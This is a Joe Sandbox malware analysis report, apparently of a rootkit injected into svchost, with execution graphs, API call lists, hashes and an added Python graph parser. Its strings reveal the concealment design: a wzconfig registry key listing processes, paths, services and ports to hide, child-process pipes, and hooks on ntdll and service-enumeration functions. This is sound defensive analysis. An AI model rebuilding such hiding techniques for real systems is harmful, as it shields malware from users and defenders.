                                                                                                                                                                                                                                                • API String ID: 1617791916-0
                                                                                                                                                                                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                                                                • Instruction ID: f1bcd8aa1abc8590651bf66f0bbd1f21628ae84c1cd742650bcaa24afb1b9de1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FE03939641B4886EB048B62F80838A36F1EB89B06F0880248A0947352DF7D84DAC7D0

Execution Graph

Execution Coverage: 0.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 74
Total number of Limit Nodes: 2
execution_graph (process 10, svchost; one node per line: node id, address, API labels, successors)

15696  22f4b921ac4                           -> 15701
15698  22f4b921ada  Sleep SleepEx            -> 15699
15699  22f4b921ad3                           -> 15698, 15700
15700  22f4b9215a0  StrCmpIW StrCmpW         -> 15699
15701  22f4b921630  GetProcessHeap           -> 15702
15702  22f4b921650  __free_lconv_num         -> 15746
15704  22f4b921658                           -> 15705
15705  22f4b921268  2 API calls              -> 15706
15706  22f4b921669                           -> 15707
15707  22f4b921268  2 API calls              -> 15708
15708  22f4b921672                           -> 15709
15709  22f4b921268  2 API calls              -> 15710
15710  22f4b92167b                           -> 15711
15711  22f4b921696  RegOpenKeyExW            -> 15712, 15713
15712  22f4b9216c8  RegOpenKeyExW            -> 15714, 15715
15713  22f4b9218ae                           -> 15699
15714  22f4b9216f1                           -> 15750
15715  22f4b921707  RegOpenKeyExW            -> 15717, 15718
15717  22f4b921742  RegOpenKeyExW            -> 15721, 15722
15718  22f4b92172b                           -> 15761
15721  22f4b921766                           -> 15724
15722  22f4b92177d  RegOpenKeyExW            -> 15725, 15726
15724  22f4b9212bc  13 API calls             -> 15729
15725  22f4b9217a1                           -> 15730
15726  22f4b9217b8  RegOpenKeyExW            -> 15727, 15728
15727  22f4b9217f3  RegOpenKeyExW            -> 15732, 15733
15728  22f4b9217dc                           -> 15731
15729  22f4b921773  RegCloseKey              -> 15722
15730  22f4b9212bc  13 API calls             -> 15734
15731  22f4b9212bc  13 API calls             -> 15735
15732  22f4b921817                           -> 15736
15733  22f4b92182e  RegOpenKeyExW            -> 15737, 15738
15734  22f4b9217ae  RegCloseKey              -> 15726
15735  22f4b9217e9  RegCloseKey              -> 15727
15736  22f4b92104c  5 API calls              -> 15739
15737  22f4b921852                           -> 15740
15738  22f4b921869  RegOpenKeyExW            -> 15741, 15742
15739  22f4b921824  RegCloseKey              -> 15733
15740  22f4b92104c  5 API calls              -> 15743
15741  22f4b9218a4  RegCloseKey              -> 15713
15742  22f4b92188d                           -> 15744
15743  22f4b92185f  RegCloseKey              -> 15738
15744  22f4b92104c  5 API calls              -> 15745
15745  22f4b92189a  RegCloseKey              -> 15741
15746  22f4b921268  GetProcessHeap           -> 15767
15748  22f4b921283  GetProcessHeap           -> 15749
15749  22f4b9212ae  __free_lconv_num         -> 15704
15750  22f4b9212bc  RegQueryInfoKeyW         -> 15751, 15752
15751  22f4b92148a  RegCloseKey              -> 15715
15752  22f4b921327  GetProcessHeap           -> 15753
15753  22f4b92133e  __free_lconv_num         -> 15754, 15755, 15757, 15758, 15759, 15760, 15769
15754  22f4b921352  RegEnumValueW            -> 15753
15755  22f4b921476  GetProcessHeap HeapFree  -> 15751
15757  22f4b9213d3  GetProcessHeap           -> 15753
15758  22f4b92141e  lstrlenW GetProcessHeap  -> 15753
15759  22f4b9213f3  GetProcessHeap HeapFree  -> 15758
15760  22f4b921443  StrCpyW                  -> 15753
15761  22f4b92104c  RegQueryInfoKeyW         -> 15762, 15763
15762  22f4b9210bf  __free_lconv_num         -> 15763, 15764, 15765, 15766
15763  22f4b9211b5  RegCloseKey              -> 15717
15764  22f4b9210cf  RegEnumValueW            -> 15762
15765  22f4b92114e  GetProcessHeap           -> 15762
15766  22f4b92116e  GetProcessHeap HeapFree  -> 15762
15767  22f4b936168                           -> 15768
15768  22f4b936177                           (no successors)
15769  22f4b921534                           -> 15770, 15771
15770  22f4b921584                           -> 15753
15771  22f4b92154e                           -> 15770, 15772, 15773
15772  22f4b921565  StrCmpIW                 -> 15771
15773  22f4b92156d  StrCmpW                  -> 15771
15774  22f4b8f2750                           -> 15776
15775  22f4b8f286c  LoadLibraryA             -> 15776
15776  22f4b8f277e                           -> 15775, 15777
15777  22f4b8f28e8                           (no successors)
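The execution_graph listing above is emitted as one run of tokens, which is awkward to read and to diff against other reports. The following parser is an added example, not Joe Sandbox code: it rebuilds nodes and edges from that token stream, reports which API names are reachable from a given node, and finds the two-node loops (here the Sleep/SleepEx and StrCmpIW/StrCmpW polling loop that the registry walk returns into at node 15713). The token grammar ("id address [labels...]" for a node, "id->id" for an edge) is inferred from the text on this page and is an assumption; the embedded sample is a subset of the listing for process 10 (svchost) copied from this report, with edges to nodes outside the subset left out.

```python
"""Parse a flattened Joe Sandbox execution_graph listing into nodes and edges.

Added example (not Joe Sandbox code). The listing grammar is inferred from the
text on this page: "<id> <hex address> [labels...]" introduces a node and
"<id>-><id>" is an edge. That grammar is an assumption, not a documented format.
"""
import re
from collections import defaultdict

# Subset of the execution_graph listing for process 10 (svchost) copied from
# this report: the sleep/compare loop plus a few registry-walk nodes. Edges to
# nodes outside the subset were left out, so some successors are missing.
GRAPH_TEXT = (
    "execution_graph "
    "15696 22f4b921ac4 15701 22f4b921630 GetProcessHeap 15696->15701 "
    "15698 22f4b921ada Sleep SleepEx 15699 22f4b921ad3 15698->15699 15699->15698 "
    "15700 22f4b9215a0 StrCmpIW StrCmpW 15699->15700 15700->15699 "
    "15702 22f4b921650 __free_lconv_num 15701->15702 "
    "15710 22f4b92167b 15711 22f4b921696 RegOpenKeyExW 15710->15711 "
    "15713 22f4b9218ae 15711->15713 15713->15699 "
    "15724 22f4b9212bc 13 API calls "
    "15741 22f4b9218a4 RegCloseKey 15741->15713"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]{8,16}$")
SUMMARY_RE = re.compile(r"^\d+ API calls$")  # collapsed subcall, not an API name


def parse_execution_graph(text):
    """Return ({id: (address, [labels])}, {id: [successor ids]})."""
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    nodes, edges = {}, defaultdict(list)
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges[edge.group(1)].append(edge.group(2))
            i += 1
            continue
        # "<digits> <hex>" starts a new node; "13 API calls" does not, because
        # "API" is not a hex address, so those tokens stay labels.
        if tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = tok
            nodes[current] = (tokens[i + 1], [])
            i += 2
            continue
        if current is None:
            raise ValueError(f"label {tok!r} appears before any node")
        nodes[current][1].append(tok)
        i += 1
    return nodes, dict(edges)


def node_apis(labels):
    """API names on a node; a collapsed "<n> API calls" label yields none."""
    if not labels or SUMMARY_RE.match(" ".join(labels)):
        return []
    return list(labels)


def reachable_apis(nodes, edges, start):
    """Breadth-first walk from start; every API label on a reachable node."""
    seen, queue, apis = {start}, [start], set()
    while queue:
        node = queue.pop(0)
        apis.update(node_apis(nodes[node][1]))
        for succ in edges.get(node, []):
            if succ not in seen:
                seen.add(succ)
                queue.append(succ)
    return apis


def mutual_loops(edges):
    """Pairs (a, b) with a->b and b->a: the tight polling loops in the graph."""
    pairs = set()
    for a, succs in edges.items():
        for b in succs:
            if a in edges.get(b, []):
                pairs.add(tuple(sorted((a, b), key=int)))
    return sorted(pairs, key=lambda p: (int(p[0]), int(p[1])))


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(GRAPH_TEXT)
    print(len(nodes), "nodes,", sum(len(v) for v in edges.values()), "edges")
    print("loops:", mutual_loops(edges))
    print("after registry walk returns (15713):",
          sorted(reachable_apis(nodes, edges, "15713")))
```

Run against the full listing, the same functions show that every path out of the RegOpenKeyExW chain ends in node 15713 and then in the Sleep/StrCmp loop, which is the shape of a resident poller rather than a one-shot configuration read.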

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
• String ID:
• API String ID: 1683269324-0
• Opcode ID: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
• Instruction ID: d81be12686201a910b7a8ac82212fa99a14c3db81ea8597e4b677e2590b7596c
• Opcode Fuzzy Hash: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
• Instruction Fuzzy Hash: 1E115E28E18641AAFBD8BFE1EB2D35B23B4A794705F404435974646193DFBCC148C211

Control-flow Graph

APIs
  • Part of subcall function 0000022F4B921630: GetProcessHeap.KERNEL32 ref: 0000022F4B92163B
  • Part of subcall function 0000022F4B921630: HeapAlloc.KERNEL32 ref: 0000022F4B92164A
  • Part of subcall function 0000022F4B921630: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9216BA
  • Part of subcall function 0000022F4B921630: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9216E7
  • Part of subcall function 0000022F4B921630: RegCloseKey.ADVAPI32 ref: 0000022F4B921701
  • Part of subcall function 0000022F4B921630: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921721
  • Part of subcall function 0000022F4B921630: RegCloseKey.ADVAPI32 ref: 0000022F4B92173C
  • Part of subcall function 0000022F4B921630: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B92175C
  • Part of subcall function 0000022F4B921630: RegCloseKey.ADVAPI32 ref: 0000022F4B921777
  • Part of subcall function 0000022F4B921630: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921797
  • Part of subcall function 0000022F4B921630: RegCloseKey.ADVAPI32 ref: 0000022F4B9217B2
  • Part of subcall function 0000022F4B921630: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9217D2
• Sleep.KERNEL32 ref: 0000022F4B921ADF
• SleepEx.KERNELBASE ref: 0000022F4B921AE5
  • Part of subcall function 0000022F4B921630: RegCloseKey.ADVAPI32 ref: 0000022F4B9217ED
  • Part of subcall function 0000022F4B921630: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B92180D
  • Part of subcall function 0000022F4B921630: RegCloseKey.ADVAPI32 ref: 0000022F4B921828
  • Part of subcall function 0000022F4B921630: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921848
  • Part of subcall function 0000022F4B921630: RegCloseKey.ADVAPI32 ref: 0000022F4B921863
  • Part of subcall function 0000022F4B921630: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921883
  • Part of subcall function 0000022F4B921630: RegCloseKey.ADVAPI32 ref: 0000022F4B92189E
  • Part of subcall function 0000022F4B921630: RegCloseKey.ADVAPI32 ref: 0000022F4B9218A8
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: CloseOpen$HeapSleep$AllocProcess
• String ID:
• API String ID: 1534210851-0
• Opcode ID: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
• Instruction ID: 9c87387f8f48b234e737faba1eb93da8d1be4e29d7256ac226bb75817f586ff6
• Opcode Fuzzy Hash: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
• Instruction Fuzzy Hash: EA31CF6DE10615A1FBD8BFF2D76827B23B4AB44BC0F1458315F098769BEE98C4B1C250

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000A.00000002.2651743458.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b8f0000_svchost.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
• Instruction ID: bb5512ff0dbf2d6757295d58d983556dc14fa88658f0bb5d8736df877bd06eb8
• Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
• Instruction Fuzzy Hash: 7A61153AF0169497DF949F95D204F6AB3A2F744B95F588130EF190778AEA78D823C700

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 104 22f4b923858-22f4b923863 105 22f4b923865-22f4b923878 StrCmpNIW 104->105 106 22f4b92387d-22f4b923884 104->106 105->106 107 22f4b92387a 105->107 107->106
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0bcdd8bc399243b85fdbdeadd6d3938df9384e511b8271d9569c855e29d0cd8c
• Instruction ID: a66383d20355286b729e5a719099632fc3136ca55460e893d02ffc0528a6567d
• Opcode Fuzzy Hash: 0bcdd8bc399243b85fdbdeadd6d3938df9384e511b8271d9569c855e29d0cd8c
• Instruction Fuzzy Hash: 79D05E2CF15205AAFB98EFE5C9E96622371DB08744F885032CB0046241EBA9C98EDB10

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 290 22f4b922b40-22f4b922bb9 call 22f4b942d50 293 22f4b922bbf-22f4b922bc5 290->293 294 22f4b922ef4-22f4b922f17 290->294 293->294 295 22f4b922bcb-22f4b922bce 293->295 295->294 296 22f4b922bd4-22f4b922bd7 295->296 296->294 297 22f4b922bdd-22f4b922bed GetModuleHandleA 296->297 298 22f4b922c01 297->298 299 22f4b922bef-22f4b922bff call 22f4b936090 297->299 301 22f4b922c04-22f4b922c22 298->301 299->301 301->294 304 22f4b922c28-22f4b922c47 StrCmpNIW 301->304 304->294 305 22f4b922c4d-22f4b922c51 304->305 305->294 306 22f4b922c57-22f4b922c61 305->306 306->294 307 22f4b922c67-22f4b922c6e 306->307 307->294 308 22f4b922c74-22f4b922c87 307->308 309 22f4b922c89-22f4b922c95 308->309 310 22f4b922c97 308->310 311 22f4b922c9a-22f4b922c9e 309->311 310->311 312 22f4b922ca0-22f4b922cac 311->312 313 22f4b922cae 311->313 314 22f4b922cb1-22f4b922cbb 312->314 313->314 315 22f4b922db1-22f4b922db5 314->315 316 22f4b922cc1-22f4b922cc4 314->316 317 22f4b922ee6-22f4b922eee 315->317 318 22f4b922dbb-22f4b922dbe 315->318 319 22f4b922cd6-22f4b922ce0 316->319 320 22f4b922cc6-22f4b922cd3 call 22f4b9219a4 316->320 317->294 317->308 321 22f4b922dcf-22f4b922dd9 318->321 322 22f4b922dc0-22f4b922dcc call 22f4b9219a4 318->322 324 22f4b922ce2-22f4b922cef 319->324 325 22f4b922d14-22f4b922d1e 319->325 320->319 327 22f4b922e09-22f4b922e0c 321->327 328 22f4b922ddb-22f4b922de8 321->328 322->321 324->325 330 22f4b922cf1-22f4b922cfe 324->330 331 22f4b922d20-22f4b922d2d 325->331 332 22f4b922d4e-22f4b922d51 325->332 338 22f4b922e19-22f4b922e26 lstrlenW 327->338 339 22f4b922e0e-22f4b922e17 call 22f4b921bc4 327->339 328->327 337 22f4b922dea-22f4b922df7 328->337 340 22f4b922d01-22f4b922d07 330->340 331->332 333 22f4b922d2f-22f4b922d3c 331->333 335 22f4b922d5f-22f4b922d6c lstrlenW 332->335 336 22f4b922d53-22f4b922d5d call 22f4b921bc4 332->336 341 22f4b922d3f-22f4b922d45 333->341 343 22f4b922d8f-22f4b922da1 call 22f4b923858 335->343 344 22f4b922d6e-22f4b922d78 335->344 336->335 347 22f4b922da7-22f4b922dac 336->347 345 22f4b922dfa-22f4b922e00 337->345 349 22f4b922e49-22f4b922e53 call 22f4b923858 338->349 350 22f4b922e28-22f4b922e32 338->350 339->338 358 22f4b922e5e-22f4b922e69 339->358 340->347 348 22f4b922d0d-22f4b922d12 340->348 341->347 353 22f4b922d47-22f4b922d4c 341->353 343->347 351 22f4b922e56-22f4b922e58 343->351 344->343 356 22f4b922d7a-22f4b922d8d call 22f4b921534 344->356 357 22f4b922e02-22f4b922e07 345->357 345->358 347->351 348->325 348->340 349->351 350->349 352 22f4b922e34-22f4b922e47 call 22f4b921534 350->352 351->317 351->358 352->349 352->358 353->332 353->341 356->343 356->347 357->327 357->345 363 22f4b922ee0-22f4b922ee4 358->363 364 22f4b922e6b-22f4b922e6f 358->364 363->317 368 22f4b922e71-22f4b922e75 364->368 369 22f4b922e77-22f4b922e91 call 22f4b935090 364->369 368->369 371 22f4b922e94-22f4b922e97 368->371 369->371 374 22f4b922e99-22f4b922eb7 call 22f4b935090 371->374 375 22f4b922eba-22f4b922ebd 371->375 374->375 375->363 376 22f4b922ebf-22f4b922edd call 22f4b935090 375->376 376->363
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
• String ID: NtQueryObject$\Device\Nsi$ntdll.dll
• API String ID: 2119608203-3850299575
• Opcode ID: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
• Instruction ID: 51cb9ab855fb66ec8be5d2d1826b638288ed67a0bdea995acf2a15a3ab2e5b50
• Opcode Fuzzy Hash: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
• Instruction Fuzzy Hash: 6AB1AF3AE10690A1FF9CAFA5D6287AA77B4FB44B84F045836DF0953796DAB8CC44C340
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
• Instruction ID: daf21aeda4cf789a077210658cbf193bd70b68446a02b37c2ce59d0c9b579d2a
• Opcode Fuzzy Hash: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
• Instruction Fuzzy Hash: 2531507AA05B8096EBA4AFA0E8943EE7370F788704F44443ADB4E57B95DF78C648C710
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
• Instruction ID: d68bef7e754f2b56ef7aacb53c210abe35860cc64dcad5b52c78b87a060c9552
• Opcode Fuzzy Hash: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
• Instruction Fuzzy Hash: B631BC3AA04B8096EBA4DF64E89439E33B0F788754F440136EB9D43BAADF78C145CB00

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\wzconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 106492572-440640706
• Opcode ID: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
• Instruction ID: 07b52497162d2f56f919d96e9523d5bb8b506c1fe4e47d473566f76a78e36670
• Opcode Fuzzy Hash: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
• Instruction Fuzzy Hash: 8271343AF14A5095EB50AFE2E9A965E2374F749B88F002531DF4D43B6ADF78C464C700

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436
• Opcode ID: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
• Instruction ID: 73884ab20b5a4ee6f31b479e3b78de45307763ec609ba1613fd3a271b7b88c26
• Opcode Fuzzy Hash: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
• Instruction Fuzzy Hash: B751273AA04B8496EB94EFA2E66835B77B1F789B89F048134DB490771ADFBCC055C700

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
• API String ID: 4175298099-1975688563
• Opcode ID: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
• Instruction ID: a2b000bf964a77a2ae0592e655d6e376738b5ff36800a8c6ea03bc55bc4b3563
• Opcode Fuzzy Hash: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
• Instruction Fuzzy Hash: A331926CD1094AB0FE8CFFE5EA797E66330AB48344F9418339609421639BFC8699D350

Control-flow Graph

APIs
• GetLastError.KERNEL32 ref: 0000022F4B92D3A7
• FlsGetValue.KERNEL32(?,?,?,0000022F4B930FDB,?,?,?,0000022F4B9309CC,?,?,?,0000022F4B92CDBF), ref: 0000022F4B92D3BC
• FlsSetValue.KERNEL32(?,?,?,0000022F4B930FDB,?,?,?,0000022F4B9309CC,?,?,?,0000022F4B92CDBF), ref: 0000022F4B92D3DD
• FlsSetValue.KERNEL32(?,?,?,0000022F4B930FDB,?,?,?,0000022F4B9309CC,?,?,?,0000022F4B92CDBF), ref: 0000022F4B92D40A
• FlsSetValue.KERNEL32(?,?,?,0000022F4B930FDB,?,?,?,0000022F4B9309CC,?,?,?,0000022F4B92CDBF), ref: 0000022F4B92D41B
• FlsSetValue.KERNEL32(?,?,?,0000022F4B930FDB,?,?,?,0000022F4B9309CC,?,?,?,0000022F4B92CDBF), ref: 0000022F4B92D42C
• SetLastError.KERNEL32 ref: 0000022F4B92D447
• FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000022F4B930FDB,?,?,?,0000022F4B9309CC,?,?,?,0000022F4B92CDBF), ref: 0000022F4B92D47D
• FlsSetValue.KERNEL32(?,?,00000001,0000022F4B92F23C,?,?,?,?,0000022F4B92C50F,?,?,?,?,?,0000022F4B927AC0), ref: 0000022F4B92D49C
  • Part of subcall function 0000022F4B92DC3C: HeapAlloc.KERNEL32 ref: 0000022F4B92DC91
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000022F4B930FDB,?,?,?,0000022F4B9309CC,?,?,?,0000022F4B92CDBF), ref: 0000022F4B92D4C4
  • Part of subcall function 0000022F4B92DCB4: HeapFree.KERNEL32 ref: 0000022F4B92DCCA
  • Part of subcall function 0000022F4B92DCB4: GetLastError.KERNEL32 ref: 0000022F4B92DCD4
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000022F4B930FDB,?,?,?,0000022F4B9309CC,?,?,?,0000022F4B92CDBF), ref: 0000022F4B92D4D5
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000022F4B930FDB,?,?,?,0000022F4B9309CC,?,?,?,0000022F4B92CDBF), ref: 0000022F4B92D4E6
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: Value$ErrorLast$Heap$AllocFree
• String ID:
• API String ID: 570795689-0
• Opcode ID: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
• Instruction ID: e033f97e4525245099d7c372d78e7e6c7bd7c207468dcd0b1050cd078bd67154
• Opcode Fuzzy Hash: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
• Instruction Fuzzy Hash: 5641092CE05250A2FADCBFB2D77E36B22725F557A4F184F349B2A066D7DAAC9441D200

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
• String ID: \\.\pipe\wzchildproc32$\\.\pipe\wzchildproc64
• API String ID: 2171963597-1908187885
• Opcode ID: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
• Instruction ID: 8a50a303fa95178e241ab5c4de6dab1416852d232bb1f4af96a468d04f80c525
• Opcode Fuzzy Hash: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
• Instruction Fuzzy Hash: D021603AA1874093FB54AF65F66835A73B0F789BA4F541235DB5902AA9CFBCC149CB00

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2651743458.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b8f0000_svchost.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
• Instruction ID: da2c2a2e52295173ddd7e2504bf9b64235013c0eac6d45ea8b79137591e09048
• Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
• Instruction Fuzzy Hash: B7D1C13AA00B409AEBA0AFA5D64879E37B0F795799F000135EF8957B57EB74D493C700

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
• Instruction ID: 1d924de9278305c148e31b0b447630519e86efe1a5e45afe5903e2605341831a
• Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
• Instruction Fuzzy Hash: BAD15B7BE00B409AFBA8AFA5D65839E77B0F745788F100935EB4957B96CB78C482C700
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
• Instruction ID: 2f77668f57cb5e97c049c5cc54ff48c13407bcee6ec94088aabda4b1b494d258
• Opcode Fuzzy Hash: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
• Instruction Fuzzy Hash: A841F42AF15A1071FA99EF96EA3875733B1B749BE0F0659399F0957386EABCC444C300

